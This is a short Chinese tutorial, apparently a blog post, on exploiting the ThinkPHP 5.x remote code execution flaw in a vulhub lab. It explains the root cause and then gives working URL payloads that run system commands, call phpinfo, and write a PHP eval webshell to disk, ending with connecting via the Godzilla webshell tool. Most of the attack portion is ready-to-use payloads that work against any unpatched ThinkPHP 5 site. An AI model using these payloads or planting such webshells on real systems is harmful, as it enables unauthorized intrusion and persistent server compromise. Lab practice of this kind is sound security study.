Thinkphp5x远程执行命令及getshell

一.环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:

漏洞利用:

漏洞根本源于 thinkphp/library/think/Request.php 中method⽅法可以进⾏变量覆盖,通 过覆盖类的核⼼属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分 原因,在利⽤上会出现⼀些问题

远程命令执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami

执行完如下图

远程代码执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

如下图

写入一句话木马:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>">>3.php

然后去访问我们的3.php 创建成功

哥斯拉连接:

相关推荐
码农派大星。几秒前
Spring Boot 配置文件
java·spring boot·后端
顾北川_野7 分钟前
Android 手机设备的OEM-unlock解锁 和 adb push文件
android·java
江深竹静,一苇以航10 分钟前
springboot3项目整合Mybatis-plus启动项目报错:Invalid bean definition with name ‘xxxMapper‘
java·spring boot
远望清一色16 分钟前
基于MATLAB的实现垃圾分类Matlab源码
开发语言·matlab
confiself26 分钟前
大模型系列——LLAMA-O1 复刻代码解读
java·开发语言
Wlq041530 分钟前
J2EE平台
java·java-ee
ZL不懂前端31 分钟前
Content Security Policy (CSP)
前端·javascript·面试
乐闻x34 分钟前
ESLint 使用教程(一):从零配置 ESLint
javascript·eslint
XiaoLeisj37 分钟前
【JavaEE初阶 — 多线程】Thread类的方法&线程生命周期
java·开发语言·java-ee
杜杜的man41 分钟前
【go从零单排】go中的结构体struct和method
开发语言·后端·golang